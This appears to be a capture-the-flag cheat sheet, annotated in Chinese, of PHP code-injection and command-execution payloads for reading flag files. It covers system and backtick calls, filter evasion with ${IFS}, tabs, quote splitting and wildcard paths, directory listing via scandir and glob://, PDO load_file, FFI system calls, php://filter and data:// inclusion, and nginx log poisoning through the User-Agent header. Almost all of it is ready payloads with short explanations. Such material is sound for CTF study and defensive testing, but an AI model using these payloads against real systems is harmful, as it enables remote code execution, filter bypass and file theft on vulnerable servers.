c=system("cat fl*g.php | grep  -E 'fl.g' "); // 获取文件的内容，然后用grep 采用正则表达式的方法，获得flag
c=system("cat fl*g.php"); // 需要采用view-source协议
c=system("tac fl*g.php"); //倒叙（行）显示文件内容

echo `cat fl''ag.p''hp`; // 反引号执行命令， 用单引号绕过flag,php不能打印的限制，需要采用view-source协议，无法对命令cat本身进行这种操作
echo `nl fl''ag.php`; // nl给每个输出加上行号

c=echo scandir(".")[2]; //打印当前目录下的文件，第三个元素
c=print_r(scandir(".")); //打印当前目录
c=var_dump(scandir("."));//打印当前目录
c=var_export(scandir("."));//打印当前目录
c=var_export(scandir("/"));exit(0);//exit(0)用于让后续的替换无法执行
c=?><?php
$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
} exit(0);
?> //高级用法，利用glob://协议来获取/*目录下的内容
c=include("/flag.txt"); //输出文件
c=require("/flag.txt"); //输出文件
c=readgzfile("/flag.txt");//输出文件

//创建PDO（数据库对象），连接系统数据库，执行查询语句
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');
foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }
$dbh = null;}
catch (PDOException $e) 
{echo $e->getMessage();exit(0);}exit(0);

//创建foreign function interface，调用系统函数，php>=7.4.0
c=$ffi = FFI::cdef("int system(const char *command);");
$a='/readflag > 1.txt';
$ffi->system($a);

c=highlight_file(next(array_reverse(scandir(".")))); //查看当前目录下的文件，倒序后，取第二个元素，然后高亮显示
c=show_source(next(array_reverse(scandir(pos(localeconv()))))); // 十分牛逼，localeconv的第一个元素是'.'，即当前目录，pos是current的别名，返回数组第一个元素，然后scandir读取当前目录，array_reverse倒序，next取下一个元素（即倒数第二个元素），show_source是highlight_file的别名显示源码
// getcwd() 函数返回当前工作目录。它可以代替pos(localeconv())
// localeconv()：返回包含本地化数字和货币格式信息的关联数组。这里主要是返回值为数组且第一项为"."
// pos():输出数组第一个元素，不改变指针；
// current() 函数返回数组中的当前元素（单元）,默认取第一个值，和pos()一样
// scandir() 函数返回指定目录中的文件和目录的数组。这里因为参数为"."所以遍历当前目录
// array_reverse():数组逆置
// next():将数组指针指向下一个，这里其实可以省略倒置和改变数组指针，直接利用[2]取出数组也可以
// show_source():查看源码
// pos() 函数返回数组中的当前元素的值。该函数是current()函数的别名。
// 每个数组中都有一个内部的指针指向它的"当前"元素，初始指向插入到数组中的第一个元素。
// 提示：该函数不会移动数组内部指针。
// 相关的方法：
// current()返回数组中的当前元素的值。
// end()将内部指针指向数组中的最后一个元素，并输出。
// next()将内部指针指向数组中的下一个元素，并输出。
// prev()将内部指针指向数组中的上一个元素，并输出。
// reset()将内部指针指向数组中的第一个元素，并输出。
// each()返回当前元素的键名和键值，并将内部指针向前移动。

c=eval($_GET[a]);&a=system('cat flag.php');//传入两个参数，c用于绕过校验，a才是真正的命令执行

//用include包含一个文件，文件名称由参数1决定，%0a主要是因为不能用空格分割关键字和包含文件名称了（去掉%0a也无所谓,似乎eval内会自动对include和文件名称添加空格来分隔）
//使用?>可以绕过分号，作为语句结束。原理是php在检测到?>时，会在?>前的最后一个语句自动加上; 
//php://filter/convert.base64-encode/resource=flag.php 是 PHP 中的一种流封装协议，允许你对流（例如文件读取）应用过滤器。这里就是对flag.php进行base64编码
c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php 
c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

c=cat flag.php; //;是用来分割命令的
c=nl flag.php%0a //%0a是换行符
c=tac flag.php|| // ||连接2个命令，如果前面一个命令执行成功，就不执行后一个命令
c=tac%09fl*g.php%0a //%09是tab键
c=tac%09fl?g.php%0a
c=tac<fla''g.php|| //<是重定向符
c=nl<fla''g.php|| //nl是给每行加上行号
c=nl${IFS}/fla''g|| //IFS是内部字段分隔符，这里是空格
c=nl${IFS}fla''g.php%0a
c=c''at${IFS}fla''g.p''hp
c=/bin/ca?${IFS}f?ag.php //ca?匹配不到命令，需要全路径
c=/???/????64 ????.??? // /bin/base64 flag.php

//data:// 这是一个数据URI方案的一部分。数据URI方案允许将小片段的数据直接嵌入到网页中，而不需要外部资源的引用
//text/plain: 这部分指定了数据的类型。在这个案例中，text/plain 表示数据是普通文本
//;base64: 这部分指定了数据的编码方式。在这个案例中，base64 表示数据是使用 Base64 编码的
//PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4=实际上是 <?php \nsystem("tac flag.php")\n?> 的base64编码

c=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4=
c=data://text/plain,<?php system("tac fl*g.php")?>
//<?php system('cat flag.php');
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

//nginx的默认访问日志目录,随后在http请求的User-Agent写入代码
/?file=/var/log/nginx/access.log
User-Agent: <?php system('tac fl0g.php'); ?>